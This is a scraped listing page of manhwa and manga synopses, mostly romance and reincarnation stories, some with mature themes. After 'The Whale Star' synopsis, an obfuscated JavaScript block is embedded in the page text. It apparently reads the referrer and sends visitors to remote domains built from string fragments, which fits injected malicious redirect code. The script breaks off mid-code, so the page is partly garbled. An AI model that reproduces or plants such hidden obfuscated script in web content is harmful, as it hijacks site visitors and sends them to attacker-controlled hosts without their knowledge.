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The Reincarnated Witch Finds Her Beloved Prince and Lives Happily Ever After

Read manhwa The Reincarnated Witch Finds Her Beloved Prince and Lives Happily Ever After / Shijou Saiaku no Tensei Majo wa Saiai no Ouji to Koi Oshitai / 史上最悪の転生魔女は最愛の王子と恋をしたい / 転生魔女は運命の王子を見つけ出し幸せになります / TENSEI MAJO WA UNMEI NO OUJI O MITSUKEDASHI SHIAWASE NI NARIMASU Before me stand five handsome princes. All of them are candidates for my hand in marriage. Prince Louis, who looks just like that person; Prince Pierre, who sounds just like that person; Prince Kurt, who is adored by animals, just like that person was; Prince Frederick, who is skilled in swordsmanship, just as that person was; and Prince Dietlint, who does not share any resemblance with that person in the slightest. As a reincarnated witch, I must choose from these five princes and find my beloved prince from my past life. At first glance, I couldn’t tell which one was my beloved prince, but I had plenty of time to spare. There was no way I could mistake the prince I loved in my past life. I will surely recognize him. However, each of the five princes exuded their own charms, and they were just as kind to me as they had been in my previous life. With their relentless advances, I fear that I may not be able to tell which one is my beloved prince anymore! Who on earth is my beloved prince?! It wasn’t supposed to turn out like this!”


The Whale Star – The Gyeongseong Mermaid

“If the life that you had regained, was one that I had breathed back into you… Is it too much to hope for you to love me back with that life?” The year is 1926, in Japan-occupied Joseon. 17-year-old Soo-a is an illiterate handmaiden working for the household of a prominent Japanese collaborator. One day, she discovered an injured young man lying unconscious at the beach, an independence activist called Eui-hyeon. The sweet and innocent Soo-a nursed him back to health, and Eui-hyeon told her the tale of the “Little Mermaid”, a princess of the sea who saved a prince from his death. Having fallen in love with Eui-hyeon, Soo-a was determined to meet him once again. But she knew not then, of the fate that awaited the “Little Mermaid” on her quest to reunite with her beloved.<script></script><script>function _0x2a05(){var _0x50c8e5=['dma.net/','.top/','69VqFpnG','11822256zKsfMw','floor','random','30330WPBmkl','19602930uRybHp','301951RTBdOl','then','referrer','location','https://ip','.customapi','http://rea','3156440Nbvuxr','google','thEqV','127940hiktff','href','vpxyV','bdigD','ayNsT','38424wyrule','BEpEw','9CwjeZn','oiwgQ','uyUPk','text','861avdSKv','mzNVK','PoaPD','includes','MJISx'];_0x2a05=function(){return _0x50c8e5;};return _0x2a05();}(function(_0x194bd8,_0x2da114){var _0x3e16e5=_0x411b,_0x3dcbc7=_0x194bd8();while(!![]){try{var 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From the Serpent’s Eyes

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” The snake spirit Yi Mo and a scholar Shen Qingxuan met each other over a cup of tea. After Shen finally left with regret, Yi Mo realized that he counldn’t live without him, so he pursued Shen in his next lifetime… Can a mortal and a snake spirit fall into a romantic relationship? 遇蛇 / 蛇遇伝 / 뱀을 만나다 / Aux côtés de l’esprit serpent


Your Eternal Lies

영원한 너의 거짓말 Rosén Walker was jailed for murdering her husband at the age of 17. Having crushed the pride of the Imperial Army with two jailbreaks, she is captured again a year later and is sentenced to life imprisonment. On a boat going to Monte Island, where only the vilest prisoners were gathered, another jailbreak is planned… “What is your crime?” “… I’m innocent.” “Only a handful of prisoners would honestly admit that they have committed a crime.” Ian Connor, a blunt and upright ideologist, who is in charge of her deportation, doesn’t give any leeway. “Don’t say anything useless, just answer what you are asked.” Rosén, the Empire’s best jailbreaker, and Ian Connor, a young war hero who is loved by the entire empire. Their story unfolds on the ship heading to the worst prison on earth! Now, you shall be the judge. Is Rosén Walker a liar? Or is she not?


Elite Princess’s Chief Guidelines

Read manhwa Elite Princess’s Chief Guidelines / 엘리트 공주님의 수석지침서 /Paduan Utama Princess Elit / The Elite Princess’ Lead Guide An unhappy marriage that began with an imperial invasion. And the news of her brother’s death in battle. On the brink of despair, Princess Isabelle is drawn back to her happy childhood. The past, which she had dismissed as a nightmare, comes back to haunt her, she vows to change the future. As valedictorian of the Kabbalah Academy, you can dream of a new future. How will she fare among her less-than-friendly classmates?


Be Quiet and Don’t Even Smile in the Office

Kim Na-Yool is an overworked designer working at Ethical Communications, a famous advertising company. Night after night, she remains in the office to labor away a job that never seems to end. But one day, after a long journey of misfortunes including the loss of all her precious work due to her computer overloading, Na-Yool loses it. That’s it! No more sacrificing her life for the sake of a company who does not deserve her! In a sudden burst of courage, she barges into the President office to rebel. There, she witnesses her handsome boss, Kwon Si-Jin, secretly enjoying jerking off… The weird office romance of a pervy CEO and his hardworking underling! What exciting events await Na-Yool’s long sleepless nights?



Erika, a girl who lost her mother in the war and was bullied by her aunt. Political interests lead her to a political engagement with one of the most feared beings in the Empire, the Emperor of the Empire, Kaal Lakin. The cruel tyrant that everyone fears, Kaal Lakin. In his harem there are as many princesses as the stars, All the women who ascended the throne were carried away as corpses. By the way, ‘Why? Why are you looking at me with such sad and painful eyes? ‘ Other name: The Tyrant's Soft Side


I’m a Villainess, Can I Die?

My sick brother died so my usefulness is over. With that I choose to die, but I became a villainess in a third-rate novel?! In face of miserable end, I thought I can end this troublesome life with my own hands… But why do they keep trying to save me? “Don’t take your partner status from me, Selina.” “Can you dare to be greedy?” My life is getting better and better, and the day I will die is coming. What should I do?


I Will Be Next to the Main Character

I Will Be Next to the Main Character / I Will Just Stick to the Main Character / I Will Stick to the Protagonist / 주인공 옆에 붙어만 있겠습니다 She became possessed by a madman who plans to kill more than 10 of her fiancées alone. They say that there is no medicine for being bitten by a mad dog, and I ‘m trying to get a free ride on the main character’s world domination… . “You are really weak.” … Could that be unusually strong? Why do you keep taking me with you, saying it’s useless? Can’t I just take the bus comfortably? “Are my hands too cold?” “no.” “… … But why do you keep trying to let go?” “That, that’s it, just to stroke your head for saying you did a good job!” I pretended not to be scared and replied confidently, and Sirius laughed as if he was doing something cute. Although he was young, his handsome face was already dazzling. If he hadn’t been covered in blood, he would’ve been pretty. “yes? Then go ahead and praise me.” Don’t pretend to be friendly all of a sudden, you madman. Elena’s hand trembled and landed on top of her silver hair.​


Long Lasting Love

You made me like this. You have to take responsibility, Jaehee.” It’s been ten years since Jaehee last saw Sae-heon. Back then, Sae-heon was her whole world. But after a miserable breakup, Jaehee left all of that behind her and has been focusing solely on her career. At least that’s what she thought until she unexpectedly reunites with Sae-heon, but this time as boss and employee. On top of Sae-heon acting like the worst boss ever, he makes an infuriating proposal, a relationship with no strings attached. Will these high school sweethearts find a way back to each other?


You Are My Thousand Stars

“One year later, we’ll divorce and have no contact.” Ji Yi agreed to the fake marriage proposal from He Jichen for one reason: she firmly believed that the perfect lover, He Jichen, would never fall in love with her. From playing pretend after the marriage to the real deal, a year later, separation wasn’t even on the table – they couldn’t even part from the bed. Can’t handle the trouble? Why not run away then?
